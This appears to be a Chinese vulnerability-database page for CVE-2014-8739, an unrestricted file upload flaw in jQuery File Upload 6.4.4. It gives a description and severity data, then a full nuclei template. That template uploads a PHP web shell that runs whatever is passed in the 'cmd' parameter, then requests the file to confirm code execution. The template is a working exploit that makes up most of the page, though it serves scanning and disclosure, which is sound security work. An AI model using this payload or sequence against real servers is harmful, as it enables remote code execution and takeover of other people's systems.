jQuery File Upload 644 - Unrestricted File Upload

漏洞信息

漏洞名称: jQuery File Upload 6.4.4 - Unrestricted File Upload

漏洞编号:

  • CVE: CVE-2014-8739

漏洞类型: 文件上传

漏洞等级: 严重

漏洞描述: jQuery File Upload是一个广泛使用的文件上传插件,支持多种文件上传方式,常用于网站的文件上传功能中。该插件因其易用性和灵活性被众多网站采用。在版本6.4.4中,由于server/php/UploadHandler.php文件缺乏对上传文件类型的严格验证,导致存在一个不受限制的文件上传漏洞。攻击者可以上传任意文件,包括PHP文件,从而在服务器上执行任意代码。这一漏洞的技术根源在于服务器端未能正确验证上传文件的类型和内容,使得攻击者能够绕过预期的安全限制。成功利用此漏洞的攻击者可以实现远程代码执行,完全控制受影响的服务器,进而可能导致数据泄露、服务中断或其他恶意活动。此漏洞的利用无需身份验证,且可以自动化执行,因此对使用该插件的网站构成了严重的安全威胁。

产品厂商: jquery_file_upload_project

产品名称: jQuery File Upload

影响版本: 6.4.4

来源: https://github.com/projectdiscovery/nuclei-templates/blob/14890e4f38c4320c53e77d6d1cec77bdacff53d6/http%2Fcves%2F2014%2FCVE-2014-8739.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155

id: CVE-2014-8739

info:
  name: jQuery File Upload 6.4.4 - Unrestricted File Upload
  author: pranjal
  severity: critical
  description: |
    jQuery File Upload Plugin 6.4.4 contains an unrestricted file upload caused by lack of validation in server/php/UploadHandler.php, letting remote attackers execute arbitrary PHP code by uploading PHP files, exploit requires uploading a PHP file with a PHP extension and accessing it directly.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution by uploading malicious PHP files, potentially compromising the entire web application and server.
  remediation: |
    - Upgrade to a patched version of jQuery File Upload plugin
    - Implement proper file type validation on the server side
    - Restrict upload directories and file permissions
    - Use whitelist approach for allowed file extensions
  reference:
    - https://www.exploit-db.com/exploits/35057/
    - https://www.exploit-db.com/exploits/36811/
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-8739
    cwe-id: CWE-434
    epss-score: 0.94326
    epss-percentile: 0.99943
    cpe: cpe:2.3:a:jquery_file_upload_project:jquery_file_upload:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: jquery_file_upload_project
    product: jquery_file_upload
    verified: true
  tags: cve,cve2014,edb,file-upload,intrusive,jquery,kev,rce

variables:
  randstr: "{{randstr}}"
  php_payload: |
    <?php
    echo "{{randstr}}";
    if(isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
    ?>

http:
  # Step 1: Check if the vulnerable endpoint exists and identify jQuery File Upload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '^{\"files\":\s*\[\]'
        part: body

      - type: word
        part: body
        words:
          - "files"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: upload_url
        part: body
        regex:
          - '"url":\s*"([^"]+)"'
          - '"upload_url":\s*"([^"]+)"'

  # Step 2: Attempt to upload a PHP file with specific jQuery File Upload response patterns
  - method: POST
    path:
      - "{{BaseURL}}/server/php/"

    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

    body: |
      ------WebKitFormBoundary{{randstr}}
      Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
      Content-Type: application/x-php

      {{php_payload}}
      ------WebKitFormBoundary{{randstr}}--

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"files":\s*\[[^\]]*"[^"]*{{randstr}}[^"]*"'
        part: body

      - type: word
        part: body
        words:
          - "files"
          - "{{randstr}}"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: uploaded_file
        part: body
        regex:
          - '"name":\s*"([^"]+)"'
          - '"url":\s*"([^"]+)"'

  # Step 3: Verify the uploaded file is accessible and contains our unique payload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/files/{{randstr}}.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_output
        part: body
        regex:
          - '{{randstr}}'

# digest: 4a0a00473045022030d53b9152e1513c3423d7cdcb1b4d794cd54be61b903513a98849ef85a7a169022100bfb0a8e2682ffeb9d07fabd8b1a238debd4d25a1790fe0b672c7289916f12b56:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #文件上传
jQuery File Upload 644 - Unrestricted File Upload
http://example.com/2025/08/01/github_814263731/
作者
lianccc
发布于
2025年8月1日
许可协议